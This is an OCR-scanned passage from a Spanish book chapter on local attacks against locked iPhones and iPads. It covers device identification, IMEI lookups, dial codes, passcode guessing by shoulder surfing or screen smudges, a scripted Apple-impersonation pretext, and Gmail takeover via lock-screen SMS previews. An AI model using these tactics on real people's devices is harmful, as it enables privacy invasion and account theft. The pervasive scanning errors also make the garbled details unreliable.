sea  en  sus  manos,  o  en  su  habitación,  es  muy  probable  que  sea  su  teléfono  de  uso  habitual.  Es  fácil 
ver  a  famosos  con  sus  temiiaales  en  la  mano,  por  ejemplo. 


Capítulo  //.  A  foques  locales  (iPhaue  Local  Trtcks) 
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Capítulo  II 
Ataques  locales 
(iPhone  Local  Tricks) 


1.  Introducción 


En  un  prt>cew  pentesting,  cuando  se  está  híLciendo  la  auditoría  interna,  tai  vez  sea  iieeesano  sacar 
información  de  un  terminal  ¡Phone  (o  iPad)  al  que  se  líene  acceso  solo  durante  unos  minutos^  por 
ejemplo  porque  se  Im  ido  su  dueño  un  momento  al  baño,  y  el  atacante  se  ha  quedado  solo  en  una 
sak  de  reunioues  esperándolo,  o  por  cualquier  otra  circunstBiicia.  En  esos  inomenLos  no  se  puede 
hacer  un  volcado  del  disco  del  termiiial,  o  realizar  m\  Jailhreak.  o  un  hackup^  y  solo  se  tienen  unos 
instantes  de  tiempo  para  manipular  el  tcnTiinai  y  dejarlo  como  estaba  antes  de  que  venga  el  dueño 
dcl 

Por  supuesto,  aunque  no  se  pueda  acceder  a  todos  los  datos  que  se  eseonden  el  terrninaL  tal  vez  sea 
posible  llevarse  algo  de  infoniiaeidn  útil  í^in  tener  que  robar  el  tenninal,  poniéndose  asi  el  atacajite 
en  uaa  situación  cíyuiprometida.  Si  además  se  han  seguido  los  pasos  adecuados  y  se  ha  estudiado  al 
objetivo  previamente,  averiguando  la  versión  exacta  de  lOS  que  tiene  su  iPhone.  su  IPod  Tauch  o  su 
iPad  puede  que  sobre  tiempo  para  hacer  otras  cosas  después  de  sacar  la  información, 

¿Qué  iurormación  es  posible  extraer  de  un  tenmnal  que  esté  bloqueado  con  el  passeode  sin  hacer 
un.  Jailbreak  al  dispositivo?  Lo  cieito  es  que  hay  varÍELs  estrategias  de  ataque  en  las  que  influye  la 
coíiflguracióii  por  defecto  del  terminal,  las  aplicaciones  que  haya  instalado  el  usuario  y  la  versión 
exacta  de  parcheo  del  sistema  operativo  (ya  que  versión  tras  versión  han  ido  apareciendo  fallos  de 
seguridad  que  permiten  desbloquear  uu  íPhone  o  un  iPad  sin  conocer 

En  este  capítulo  se  mostrarán  cuáles  son  las  debilidades  de  configuración  y  los  fallos  de  seguridad 
que  se  conocen  de  las  últimas  versiones  de  iOS,  dejando  al  lectoj  la  labor  de  preparar  la  estrategia  de 
un  ataque  para  que  fLincioiie  en  los  niinutos  que  se  tengan  disponibles  para  manipular  el  dispositivo. 

Se  recuerda  que  para  conocer  fa  versión  exacta  del  sistema  operativo  del  objetivo  a  atacar,  solo  hay 
que  címscguir  que  la  vícrima  se  conecte  a  un  seividor  web  controlado  (mediante  un  ¡ink  por  Twhter 
o  un  mensaje  acortado)  y  analizai^  el  Us&r-Ageuí  de  la  conexión,  tal  y  como  se  ha  visio  y  se  mostrará 
en  otros  capítulos  de  esíc  libro. 
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Hacking  de  dispositivos  iOS:  iPhone  c6  iFad 


Reconocer  el  modelo  de  dispositivo  en  una  inspección  preliminar 

Ln  ojo  bien  avezado  puede  obtener  mucha  información  de  líii  Lcnninal  iFhone  solo  con  verlo.  Se 
recomienda  conocer  bien  ios  inodeloüi  de  iPhone  (o  iPad}  para  saber  qué  versión  de  sistema  operativo 
se  encueiitia  en  cada  uno  de  ellos,  A  día  de  hoy  lo  más  común  que  se  puede  encontiar  son  equipos 
iPhmm  S,  tPhone  4S\  iPhof7e  4  y  algún  iPhone  3GS, 

Reconocer  un  ¡Phone  5  es  tacíL  ya  que  es  más  estrecho  y  alargado  que  el  íPhone  4  o  iFhone  4S, 
taoTOSO  por  tener  la  antena  alrededor  del  terminal.  El  iPhofie  3GS  es  el  que  tiene  los  laterales 
retí  ondeados,  al  igual  que  el  ya  abandonado  íPhone  3G. 


iPhoneS  iPhone4kS4  iPhone4 

Imsgeu  02  01:  ¡ehone  4,  ¡Fhüfie  4S  e  íFI^one  J  ditérencíns  tísicas. 

Diferenciar  físicamente  un  iPhone  4  de  un  iFhone  4S  es  posible,  ya  que  basta  con  mirar  los  cortes 
en  ia  antena  que  rodea  al  telefono.  En  iPhane  4  hay  dos  cortes,  uno  en  la  paite  superior  y  olio  en 
el  lateral  de  los  boLtmes.  Por  el  contrario,  en  el  i  Phone  4S  los  dos  cortes  se  encuentran  en  el  mismo 
ladoj  es  decir,  en  el  lado  de  la  botonera. 


Tniage.li  0(2.02:  Los  kileiLiltíS  cloí  iPad  I  ¡>oa  rectos. 


Fn  el  caso  de  tPúá,  reconocer  ios  modelos  con  una  inspección  preliminar  Lambí  en  es  posible.  El 
primer  íPad,  (al  que  llainareiuos  ¡Pad  /),  es  el  único  que  tiene  los  laterales  rectos,  mientras  que  el 


23 


Capitulo  IL  Ataques  locales  (íFhtmk^.  Local  Dlcks) 


resto  de  los  modelos  LicTien  los  laterales  redondeadoí^  y  solo  se  vendió  en  color  metálico,  iPadl  es  el 
modelo  que  lleva  la  Smarí  Cover,  es  decir,  la  protección  magnética  que  interactiía  con  el  dispositivo 
solo  en  la  parte  delantera  y  además  es  el  más  delgado  de  todos. 


ns.nü-  junLo  s  an  iPad  3. 


iPad ()  new  ü'ad,  salió  con  Sman  Cover  delantera  y  trasera  y  se  diferencia  de  iPad  2  en  qne  mide 
6  inilirnetros  más  de  grosor  y  tiene  ligeramente  distintos  los  bordes  de  las  esquinas  v  por  detrás. 
iPad  1  lleva  una  pestaña  negra  en  la  parte  superior.  Diferenciar  iPad  3  del  New  new  iPad  es  posible 
porque  este  lütimo  lleva  el  conector  ligfming  al  igual  que  iPhoue  5.  Por  último  iPadmini  es  el  iPad 
pequeño  y  a  día  de  hoy  solo  hay  una  versión  en  el  mercado. 


Imagen  Ü2.Ü41  íPaá  3  y  Ni^.w  ntiw  iPad 


Hay  que  tener  cu  cuenta  que  si  tiene  una  funda  que  no  es  la  estándar  es  una  buena  noticia  para 
el  atacanie  puedes  tener  que  ser  bueno.  Reconocer  la  versión  hardware  es  importante,  ya  que  así 
es  posible  saber  más  o  menos  con  qué  versión  de  iOS  ,se  va  a  encontrar.  Esto  es  así  debido  a  que 
1^  versiones  que  se  pueden  instalar  en  un  terminal  concreto  sin  manipularlo  con  JaUbreak  están 
limiüidas.  La  siguiente  tabla  recoge  las  versiones  que  pueden  estar  instaladas  en  cada  versión  del 
rerminal. 
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Ilacfcmg  de  di^-posUivas  lOS:  íP/7üne^  &  ¡Pad 


Modelo 

Versión  de  sistema  operativo  iOS  que  puede  tener  instalado 

IPhone 5 

ios  6aiOS  6.13 

iPhone  4S 

iOS5íiiOS6.}3 

iPhone 4 

iOS4-á  iOS6.¡  3  "1 

iFhone  3GS 

iOS  3  a  iOS  6. 13  I 

New  new  iPad 

¿OSÓ,  iOS6.¡.3  1 

iPad  J  («en’  iPad) 

ÍOS5.1  a  iOS  6.}. 3 

iPadl 

iOS  43  a  ¡05  6.1.3 

iPad 

iOSS.XaiÚSS.L! 

iPadmini 

iüS  6  a  ¡OS  6.1.3 

Tabla  Ü2.0I :  Versiones  sopoitíidí9.s  de  iOS  por  los  diferentes  mtxielos  de  iFhoi^e  o  iPúd. 


Como  se  puede  ven  iFhone  3QS  es  el  que  más  variedad  de  versiones  soporta.  Se  han  dejado  fuera 
de  este  e  si  adió  las  versiones  de  iOS  soportadas  de  ¡Pod  Touch^  y  los  Wkone  CDh^íA^  estos  últimos 
solo  utilizados  en  Estados  Unidos  para  eomuiiicacioties  de  voz  sobre  redes  Wi-Fi,  Además,  hay  que 
tener  en  cuenta  que,  a  pesar  de  que  iPhone.  3GS,  iPho}w.  4  o  iPad  2  soportan  íOS  5  o  iOS  d,  este 
viene  con  liiiiimciooes  y  no  existen  funciones  de  mapas  ni  SirU  que  como  ya  se  verá  es  muy  luíI  en 
un  proceso  de  pmt(>^fmg. 


En  iOS  6. 1  se  ha  introducido  una  nueva  forma  de  reconocer  el  sistema  operativo,  ya  que  se  ha 
cambiado  el  aspecto  del  reproductor  de  música^  así  que  basta  con  hacer  dos  clics  en  eJ  botón  de 
acción  para  acceder  al  reproductor  y  saber  qué  versión  es.  Si  tiene  el  nuevo  (más  minimalista)  es  la 
versión  ¡OS  6J  o  superior.  Además,  es  posible  acceder  al  último  recurso  que  se  ha  visÍLado,  y  esto 
puede  ser  hasta  un  vídeo  de  Internet,  doude  se  podría  saber  qué  estaba  haciendo  el  usuario. 


Imagen  02.05:  Repfodncíorde  tOIi  6. !  éU  el  que  se  ve  la  URL  de  un  vídeo  y  TeproducLur  de  versiones  anteriores. 


De  todas  fonnas,  si  el  atacante  se  tiene  que  enfrentai  a  un  dispositivo  iPod  Touch,  iPhorie  CDMA 
o  Apple  TV  y  quiere  saber  qué  versiones  de  tOS  podría  estar  corriendo,  puede  ir  a  la  fecha  de 
lanzamiento  del  producto  en  IVíkípedta  y  buscar  dicha  fecha  en  h!tp:FsMpport.Ápp!e.com/kh/ 
HTí222^  que  mostrará  cuando  salió  cada  actualización  de  ¿OS.  Se  puede  apreciar  que  sienipiie  hay 
una  versión  que  coincide  con  la  fecha  del  lanzamiento  dd  producto. 


Capííido  1 1.  Ataques  k^caíes  (iPhone  Local  Tricks) 
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Los  números  de  serie  y  el  IMEI 

Como  todo  toj  :njrial  de  telefonía,  lo^  modelos  de  iPhone  tienen  un  número^IMEr  [Inteníatiünaí 
Mobíle  Equipment  fdeimty)  y  los  Krjtneros  de  Serie  de  fabricación,  listos  niimeros  pueden  ser 
utilizados  para  trazar  la  linea  de  la  bdstoria  del  dispositivo,  que  va  desde  las  características  de 
fabricación  hasta  su  dueño  punto  de  venta,  siendo  también  posible  para  reconocer  el  terminal  en  las 
redes  de  telefonía  por  medio  del  IMRI  y,  eventual  mente,  bloquear  el  dispositivo  cuando  haya  sido 
robado  o  perdido. 


ímagm  02,06:  Númeríis  de  .3 cric  de  m  íPad 


Las  ubicaciones  del  IMEI  cambian  dependiendo  del  rnodclo,  pero  Intlos  están  en  el  terminaL  En 
iPüd y  en  IPhone;  5  lus  números  IMFJ  están  en  la  parte  posterior  del  tenninal,  mientras  que  en  los 
iPhone  .9(7,  iPhone  iPhone  4  y  en  los  iPhone  4S  hay  que  sacar  la  tai; jeta  SM,  ya  que  esLá  en  la 
carcasa.  Para  ello  se  debe  llevar  la  llave  de  apertura  de  la  SIM  entre  fas  ganziias  de  ¿oc^ícking  (esta 
llave  es  útil  si  además  se  desea  realizar  algún  ataque  que  se  mostrará  más  adelante),  e  introducirla  en 
el  agujero  que  hay  en  la  ranura  lateral  de  la  SIM. 


IrnugtfTi  02, 07:  Müracro  de  sene  en  btindcja  de  ía  S.IM  y  llave  para  extracción. 
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HarMng  de  dísposiiívos  iOS:  iPhone  ¡Pad 


Si  no  se  dispone  de  una  llave  a  mauo,  siempre  se  puede  utilizar  un  clip,  e  introducirlo  con  mucho 
cuidado.  En  la  web  de  Apple  están  las  explicaciones  para  cada  modelo,  pen»  Lodos  son  básicamente 
igual,  simplemente  hay  que  buscar  el  agujero,  meter  la  llave,  hacer  clic  y  sacar  la  bandeja. 


hnageü  02.08:  Proceso  de  extracción  Je  SIM. 


Los  números  de  serie  pueden  ser  obtenidos  con  solo  visualizai  la  parte  posterior  del  teléfono,  así 
que  pata  tenerlos  bien  inven Lari ados  en  un  análisis  forense  o  utilizarlos  cuando  sea  preciso  (como 
por  ejemplo  para  “dar  un  cambiazo”  posteriormente  y  llevarse  el  correcto)  o  realizar  un  ataque  de 
ingeniería  social  del  tipo: 

'"Hoia^  somos  de  Apple  y  hemos  deíeciado  que  su  modelo  iiene  un  fallo  de  fabricación  y  le  vamos  a 
llevar  un  iPhone  5  en  smütucÁón  a  iodos  los  clientes  cuyo  númem  de  serie  acabe  en 


IjiifLgec  02.09:  Descriptióti  completa  de  iin  lennmat  a  par  til  de  m  IMEI. 
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Estos  datos,  por  lo  que  se  pueda  necesitar  en  el  futuro,  se  pueden  obiener  rápidamente  fi^ciendo  una 
fotogiuEa  a  la  parte  posterior  del  dispositivo  del  objetivo.  Además,  el  código  ÍMEJ  puede  servil*  para 
corncer  en  detalle  las  características  tísicas  dei  terminaL  y  saber  entre  otias  cosas  si  es  un  IPud 3^  u 
un  ¿\ew  new  ¡rad  y  sí  tiene  3G  o  solo  Wi^Fi. 

Paia  ello  se  pueden  utilizar  iiiúl tiples  bases  de  datos  de  consulta  de  información  del  terminal  a 
partir  dei  código  TMFl  en  Internet.  Para  este  ejemplo  se  ha  utilizado  iras 

introducir  el  valor  del  IMEl  se  obteiidiún  todas  las  características  dcl  modelo.  Esta  base  de  datos 
tiene  limitado  el  nújiiero  de  con  su  lias  por  día,  poro  además  permite  saber  sí  el  IMJLI  está  bloqueado 
en  los  operadores  por  alguna  denuncia  de  robo. 


Códigos  de  marcado  especiales 

En  iPhone,  como  en  muchos  de  los  terminaies,  se  pueden  utilizar  códigos  de  marcado  especiales  que 
pueden  ser  utilizados  desde  la  aplicación  de  realización  de  llaniadas.  Esto  pcnnilc,  (a  pesar  de  que  no 
se  haya  conseguido  desbloquear  todo  el  terminal  con  un  bug\  el  poder  lanzar  comandos  desde  dicha 
aplicación  ^.llí.  Estos  códigos  los  hay  para  la  realización  de  llamadas  y  para  el  envió  de  mensajes 
SMS  y  dependiendo  del  operador  de  telefonía  funcionarán  unos  u  otros.  La  lista  de  códigos  que  se 
pueden  utilizai'  es: 


Códigi> 

Utilidad 

*^06# 

Muestra  el  IMEI  del  teriiilrial. 

+3001/^12345# 

Muestra  el  Eield  Test,  que  será  de  gran  ayuda  para  los  ataques  de  una 
estación  de  telefonía  falsa,  como  ser  verá  más  adelante  en  este  libtí). 

+#21# 

¡ 

Muestra  sí  existen  desvíos  de  llamadas  para  diferentes  servicios 
activados. 

Muestra  la  lista  de  llamada  en  espera. 

*#30#+ 

Muestra  la  ctjnr¡gu.raeió>n  tle  ver  el  número  de  quién  te  está  llamando. 

*#3.1# 

Muestra  configuraciones  especiales  de  iPkonc. 

#3 1  #núiiiero 

Permite  hacer  una  llariiuda  oculta  al  número  que  se  marque. 

++04+anligu»?rN 
“aiievoPJN  “"niievoPlN# 

Cambia  el  valor  del  PIN. 

liibJa  02,02:  Lista  de  códigos  de  marcado  especiales. 


Estos  códigos  no  son  únicos  de  IPhüue^  y  según  los  operadores  se  ofrecen  más  o  menos  códigos, 
por  lo  que  es  muy  interesante  averiguar  antes  el  operador  al  que  se  conecta  este  terminal.  Esto  es  tan 
sencillo  como  ver  la  red  a  la  que  se  conecta  o  hacer  un  ataque  Ciiem-side  tal  y  como  se  ve  en  otio 
capítulo,  usando  por  ejemplo  un  correo  electrónico  o  un  liiperciilaee  para  averiguar  a  que  operador 
pertenece  la  dirección  ÍP  por  la  que  se  conecta  el  dispositivo. 
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2,  Adivinar  el  passcode  de  un  iPIione 

En  este  apaitado  se  realizará  una  dcscripcioTi  sobre  los  distintos  métodos  que  pueden  ser  empleados 
para  averiguar  del  sistema  operativo  iOS. 


Shouldcr  Surfing 

Para  i  liten  tai  sacar  datos  de  un  objetivo  en  concreto  hay  que  prestar  mucha  atención  al  pafscodc 
de  la  víctima.  Para  ello,  conviene  preparar  ima  estrategia  sencilla  que  permita  estar  cerca  de  dicha 
víctima  cuando  vaya  a  iiitenrupirlo.  Esto  se  conoce  como  Shoulder  Smdmg,  o  sirripkmcntG,  “Mirar 
por  en  c  i  ma  d  e  I  hombro’  -  | 

La  forma  ttiús  sencilla  es  programar  un  Tweef.  un  SMS,  o  un  ^Vhatsapp  para  que  le  ilegue  a  la 
víctima  cuando  el  atacante  esté  presente.  Una  forma  que  tiene  dicho  atacante  de  hacerlo  es  (en  caso 
de  teiierío  escrito)  enviarlo  disimuladainentc  cuando  se  esté  en  la  mejor  posición  y  utilizar  un  poco 
de  ingeniería  social  dcl  tipo:  ¡o  envié  ames  de  ^enir  En  caso  de  utilizar  este  truco,  está  bien  que 

antes  de  enviarlo  se  le  diga  a  la  víctima  algo  como  ''¿No  íe  ha  llegado  el  mensaje  que  te  envié  esta 
mañana? Todo  el  mundo  está  acostumbrado  a  que  eso  sea  un  caso  normal,  así  que  no  se  extr^iñará 
para  nada. 

Para  hacer  esto  es  posible  incluso  usar  los  servicios  de  las  operadoras  que  permiten  diferir  la  entrega 
del  SMS,  Por  ejemplo,  en  Movistar,  para  retrai^r  la  entrega  de  un  SMS  1  hora  basta  con  comenzar 
el  mensaje  con  *POST  l#Mensaje, 


Shouldcr  Surfing  con  iSpy 

,  Conto  manera  avanzada  de  hacer  Shoulder  Smiing  en  dispositivos  iPhone^  (debido  al  especial 
funcionamiento  del  teclado  y  a  lo  estandarizado  en  los  modelos),  es  utilizar  una  herramienta  llamada 
iSpy  que  permite  reconocer  lo  que  una  persona  está  tecleando  a  partir  de  una  grabación  de  vídeo.  En 
este  caso,  preparar  una  estrategia  es  mucho  más  complicado  y  solo  podrá  utilizarse  cuando  haya  una 
cámara  de  vigilancia  o  un  entorno  especialmenTe  preparado,  por  ejemplo  en  una  sala  de  reuniones 
donde  se  haya  montado  un  sistema  de  grabación  previamente.  \s 


imagen  Ü2  Jü:  Proceso  de  rcconoeiinicnto  de  teclado  de  iPhofw  en  vídeo  con  iSpy. 
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El  estudio  se  hizo  en  la  Universidad  de  Carolina  del  Norte  en  Chapel  Hil,  y  se  puede  ver  un  video  de  la 
demostración  en  la  siguienLe  CTRL:  http://w\^\isegimdad4ppiexom/20}i/¡I/iSpy-recünslrií\'endn- 
io-tecíeiidij-en -im.  htnil 


Reconocimiento  de  la  complejidad  del  passcode 

Los  temí  inales  iPhone^  dependiendo  del  tipo  de  passcode  que  se  haya  conñgurado  van  a  m  castrar 
im  teclado  lolalmenre  distinto,  así  que  si  prestando  atención  a  la  pantalla  se  sabrá  si  merece  la  pena 
intentar  averiguarlo  o  no.  Lo  más  habitual  es  que  el  passcode  tenga  cuatro  dígitos  numéricos,  y  si 
esto  es  así  se  podrá  ver  un  teclado  solo  de  números  en  el  que  hay  cuatro  casillas  totalmente  separadas. 


Sin  embaigo,  si  se  ha  cnrUigurado  un  passcode  complejo,  en  el  que  el  núiiieru  tiene  más  de  4  cifras, 
entonces  las  cajas  se  convertirán  en  una  sola  de  entrada  de  datos  sin  delimitación  alguna  entre  cada 
ima  de  las  posiciones.  Poi  úllirno,  el  escenario  más  complejo  mostrará  un  teclado  alfanumérico. 
Adivinar  el  passcode  en  este  caso  suele  ser  muy  difícil,  asi  que  en  tai  caso  el  aLaeaute  puede  optar 
por  pensar  en  otras  estrategias  de  ataque. 


Tmjioen  02.11:  Difermlí;^  teclados  cu  fundón  de  la  complejidad  deLrírií.tr^íjJcí, 


A  pesar  de  que  tenga  passcode  el  terniiiiaL  muchos  usuarios  por  comodidad  optan  por  dejai  una 
coníiguración  inseguía  de  110  bloquear  con  passcode  hasta  pasado  uu  minuto,  asi  que  si  el  dueño  del 
terminal  acaba  de  dejar  bloqueado  el  teléfono  y  el  atacante  tiene  tiempo,  eon.seguTrá  entrar  antes  de 
que  se  bloquee  el  dispositivo. 


Saber  si  tiene  Wi-Fi  o  no 

Una  de  las  cosas  que  se  mostrará  más  adelante  es  que  es  importauíe  conocer  a  que  redes  WLFi  se 
puede  conectar  un  iPhoiie,  Para  ello,  cuanto  se  tenga  un  iPhone  o  fPad  delante  hay  que  procurai' 
hjame  si  está  conectado  a  una  rcfl  WPFi  o  no.  Esto  se  va  con  un  icono  que  apai  ece  en  la  parte  superior. 
Si  lo  está,  entonces  es  más  útil  que  el  atacante  averigüe  qué  redes  inalámbriens  hay  operando  en  esa 
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zona.  Esto  es  importante  para  poder  hacer  ataques  que  se  veráíi  más  adelante  (como  el  dcl  Rogue 
AF\  o  para  poder  tener  acceso  al  dispositivE)  por  medio  de  OpetiSSH  por  Wi-Fi. 

Es  importante  apuntar  las  redes  Wi-Fi  ocultas  en  este  proceso,  para  lo  que  será  conveniente  que  el 
atacante  “sniffe’’  durante  algún  tiempo  el  espacio.  Además,  en  caso  de  tener  ocasión  es  recomcTidahlc 
apagar  el  dispositivo  y  volver  a  encenderlo.  Esto  hará  que  el  tcTniinal  se  conecte  a  la  red 
aunque  no  se  haya  puesto  el  passeode^  lo  que  permitirá  saber  exactamente  qué  redes  busca. 


Item 

Accessíble 

Wi-Fi  passwords 

After  fírst  unlock 

Mail  accounts 

Afrer  first  unlock 

Exchapge  accounts 

Afcer  fim  unlock 

'  VPW  CErtificates 

AJways,  non-migratory 

VPN  puswords 

After  first  unlock 

LDARCallDAVCardDAV 

After  first  unlock 

¡Tunes  backup 

When  unbcked,  non-migratory 

Vbicemail 

Always 

Safari  passwords 

When  unbcked 

Bluetooth  keys 

Alw^s,  non-mígratory 

Apple  Püsh  NotilicatioTi  Service  Token 

Always,  non-mlgratory 

iCIoud  ce trífi cates  and  prívate  keys 

Always,  rran-mi^tory 

iíiessage  keys 

Ahvays,  non-mtgratory 

Certifi cates  and  prívate  keys  (Configurarían  Profiíe) 

Always,  non-migratory 

SIM  PIN 

Alwsys,  non-migratory 

IiTiagt^n  1>2J2:  Niveles  de  protección  de  contra  seibas. 


Respecto  a  las  contraseñas  de  la  red  WI-Fi  hay  que  tener  cu  cuenln  que  las  contrasefías  en  íOS^  debido 
a  Data  Protection,  se  liberan  dependiendo  de  su  nivel  de  configuración  en  diferentes  instantes.  Los 
prt)grdmadorcs  pueden  configurar  que  las  contrasefías  estén  disponibles  en  estas  situaciones; 

Always:  La  contraseña  es  accesible  en  el  momeriLo  en  que  el  Histema  operativo  íOS 
arranca.  Es  decir,  basta  con  encender  el  termina]  y  cualquier  servicio  o  programa  corriendo 
en  el  sistema  tendrá  la  capacidad  de  acceder  a  ellas. 

W hen  unlocked:  La  contraseña  solo  estará  accesib  le  e  aando  el  us  uario  tenga  desbloqueado 
el  temiiiiab  En  el  uiomento  en  que  este  se  bloquea  1a  contraseña  se  elimina  de  la  memoria  y 
no  está  disponible  para  ningún  proceso  o  servicio. 

“  When  Locked;  Estas  claves  solo  están  disponibles  cuando  el  termina!  está  bloqueado,  es 
decir,  cuando  el  usuario  im  ha  puesto  el  passeode. 
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After  first  Unlück:  Tas  claves  se  liberan  la  primera  ve/  que  d  Lcrminal  arranca,  lucgL)  hc 
quedan  disponibles  para  todos  los  programas  y  no  importa  si  el  dispositivo  está  bloqueado 
o  no  . 

Hay  que  tener  en  unen  La  que  a  partir  de  ¡OS  5  se  cambió  el  nivel  de  seguridad  de  las  contraseñas  de 
las  redes  pasando  de^/M^íJv^  (es  decir,  que  se  liberan  nada  más  arrancar  el  disposíLivn)  a  After 

Uníock.  lo  que  indica  que  solo  se  conectará  a  una  red  Wl-Fi  si  el  terminal  ha  sido  desbloqueado 
■na  ve/.  Fskj  será  cspecialrrieTite  importante  a  fa  hora  de  decidir  si  se  puede  apagai  el  dispositivo  o 
Si  el  terminal  es  un  iOS  4.  se  puede  apagar  sin  problemas  el  termina^  que  volverá  a  conectar?^e 
a  las  redes  Wi-Fl  cercanas,  con  lo  que  será  posible  saber  qué  redes  busca  aún  sin  tener  el  passeode. 


Compartir  Internet 

A  diferencia  de  las  contraseñas  de  la  cone^dón  de  datos  Edge  o  3G,  si  el  usuario  ha  corifiguTado  el 
icnnhial  para  no  solicitai  el  PIN  de  la  red  de  telefonía,  esta  se  libera  nada  más  arrancar  el  temiinal, 
lo  que  puede  ser  útil  cu  escenarios  en  los  que  d  sujeto  tenga  activada  la  opción  de  compiartir  Interneq 
ya  que  automáticamente  levantará  este  servicio.  Sin  embargo,  las  conexiones  solo  se  podrían  hacer 
por  los  medios  que  estén  establecidos  eu  el  seivicio,  y  que  podrían  ser  USB,  Bliietooth  o  Wi-Fi.  En 
eJ  caso  de  Wi-Fi  ya  se  ha  visto  que  en  iOS  5  o  iOS  íí,  solo  se  conseguiría  cotieclivídad  si  se  dispone 
del  passeode,  mientras  que  en  USB  o  Bhmooth  solo  sería  posible  hacerlo  desde  un  dispositivo  con 
el  que  se  baya  realizado  la  asociación  previamente,  es  decir,  desde  el  ordenador  de  la  víctima. 

La  limitación  es  alta,  pero  en  un  easo  en  el  que  el  passeodi^  sea  complejo  y  sea  posible  lograr 
conectividad  se  podría  hacer  un  JailbfeaL  instalar  im  servidor  OpenSSH  y  conectarse  al  terminal 
para  poder  sacar  la  información  allí  contenida  con  procesos  tói-enses,  lo  que  implicaría  '"requisar  el 
terminal”.  Por  ahora  soh>  hay  que  ñjarsc  cu  que  tenga  activados  estos  servicios,  que  se  pueden  ver 
con  los  iconos  que  apareoen  en  la  parte  superior  de  la  pantalla  de  bloqueo. 

-  Sñnbolo  de  Bhíetoúth  si  está  activado  el  BiuetootfL 

-  Símbolo  de  intensidad  de  señal  si  esta  activada  la  red  Wt-F¿, 

Barra  azul,  si  está  activado  el  ser\Hcio  de  compartición  de  Internet  y  alguien  está  concetado 
a  él 

El  passende  en  la  grasa  de  la  superficie 

Si  se  confirma  que  ei  terminal  tiene  un  passeode  de  cuatro  dígitos  numéricos,  tal  ve?  se  pueda 
adivinar,  y  alu,,  cuanto  menos  aseado  sea  el  objetivo  mucho  mejor.  Esto  es  porque  al  usarse  el  dedo 
para  teclear  el  eóciigo  de  [leshloqucíj,  se  está  produciendo  un  conLacLo  entre  la  grasa  corporal  y  la 
pantalla  dal  ¿Fhoue. 

Lo  ideal  es  llevar  un  equipo  forense  profesional  para  analizar  la  grasa  de  la  pantalla,  pero  si  esto 
no  es  posible,  el  tener  una  fotografTa  de  calidad  permitiría  hacer  un  análisis  de  las  claves  con  más 
probabilidades  de  ser  usadas  en  ei  terminal 
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En  !a  siguiente  imagen,  sí  se  superpone  mi  teclado  grosso  modo  sobre  ella,  se  puede  apreciar  que  en 
la  zona  do  icol  ado  hay  nn  sillo  mny  iTiarcado,  lo  que  parece  indicar  que  en  dicha  zona  se  ha  pulsado 
más  de  una  vez.  El  resto  de  los  sidos  en  la  zona  del  teclado  parecen  más  o  menos  con  la  misma 
probabilidad.  Dependiendo  de  las  opciones  de  coníigiiracíón  del  termiiml  se  podrán  probar  varias 
COI  ubi  ilaciones  de  filli  ñeros  para  ver  si  hay  suerte  y  se  consigue  desbloquear. 


Iiiui^eii  02. 13:  SLiperride  cit:  Ili  pisiiUiliEi  úc  ¡Phorii' avu  iniin^hbis  úc 


Borrado  de  datos  con  número  de  passeodes  erróneos 

Para  evitar  el  nuiiiert)  de  i n Lentos  máximos,  los  lisuarios  pueden  establecer  un  iTiecanismo  de 
seguridad  que  hace  que  al  fallar  10  veces,  los  datos  del  equipo  sean  borrados.  No  es  fácil  realizar 
esto,  ya  que  a  partir  del  quinto  intento  el  tenninaJ  empezará  a  bloquearse  temporalmente,  lo  que 
impide  un  ritmo  de  inlrodueeión  rápido  de  e6digí>s  tal li dos. 

No  obstante,  con  tiempo  suficiente,  es  posible  forzar  el  borrado  de  ios  datos  de  iin  tenninal,  y  obligar 
a  la  persona  dueña  del  equipo  a  realizar  iin  proceso  de  restauración  desde  el  b¿ickup. 


General  Bloqueo  coH  código 


Borrar  datos  ’  |  O  ^ 

h  _ _  _ _ ~ '  .i 

Borra  io  dos  loS’  datos '  del  iP  hone 
tras  1 0  i  ntentos  faj  li  dos.  de  ínftrodudr  el 

; '  La  pmtecétóti  de 

Irnitgen  02.14:  Dorrado  de  datos  tras  nÚTiero  de  intentos  erróneos  d.es£.cTÍvadf>. 

Hay  que  tener  esto  en  cuenta  cuan  do  se  quiera  averiguar  el  código,  ya  que  si  se  alcanza  el  níimero 
máximo  de  intentos  puede  que  se  bcuTen  los  datos,  y  se  pierda  toda  la  información. 
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B.  Previsualización  de  mensajes  por  pantalla 

primera  de  las  opeiones  inseguras  por  defecto  que  tienen  ios  terminales  IOS  es  la  de  uiostiai  las 
l^visíjalizaciones  de  ios  mensajes  por  pantalla.  Esto  es  algo  que  liace  más  eóniLHlo  para  d  usuario  la 
HlBctura  de  un  SMS,  un  uiía  alerta  de  reunión  o  un  inensaje  de  correo  electrónico,  pero  que 

tsi^De  un  riesgo  para  la  privacidad  de  la  persona.  Para  cualquier  persona  le  bastará  con  obseiTar  k 
[jiantalla  y  acceder  al  contenido  que  allí  se  muestre,  sin  necesidad  de  desbloquear  el  terminal. 

iPor  supuesto  esto  atenta  contra  la  privacidad  del  usuario,  y  para  evitar  esto,  versión  a  versión  de 
iOS.  se  ha  ido  creando  un  sislcma  iTuicbo  más  graniilar  de  cordigiiración,  que  permite  al  dueño  del 
teminal  elegir  hasta  tres  sitios  diferentes  para  recibir  las  alertas  y  prevísualizaciones  de  los  mensajes 

cada  nna  de  las  aplicaciones,  lo  que  hace  que  al  final  siempre  queden  algunos  por  pantalla.  Esto 
ís  así  porque  se  debe  k  una  a  una  en  cada  aplicación,  configurando  una  previsualización  o  no  de  los 
mensajes  que  se  van  a  recibir,  lo  que  es  un  trabajo  tedioso. 


Jrriugtn  Ü2.15:  Contiguración  de  opciones  de  previsaalizaciór  eti  menf^ajes  SMS  e . 

Si  esta  es  la  configuración  que  tiene  la  víctima,  el  alacante  puede  usar  uno  de  los  trucos  más  sencillos 
para  robarle  cuaiquicr  cuenta  de  servicio  que  tenga  asociado  el  número  de  teléfono  pata  recü[jerar  la 
coTirraseña,  y  la  más  evidente  de  todas  estas  es  la  cuenta  de  Gmad. 

.41  diiigirse  a  las  opciones  de  recuperaekSri  de  etmLrascña  de  Gmad  y  solicitar  la  opción  de  “He 
olvidado  mi  contraseña'’,  una  de  las  opciones  que  muestra  es  la  de  enviar  un  mensaje  SMS  al  número 
de  teléfono  asociado  a  la  cuenta.  Si  la  cuenta  está  asociada  al  terniinal  íPhone  dcl  objetivo,  bastará 
con  solicitar  esa  opción»  es  necesario  por  LanLo  conocer  el  número  de  teléfono  del  objetivo. 

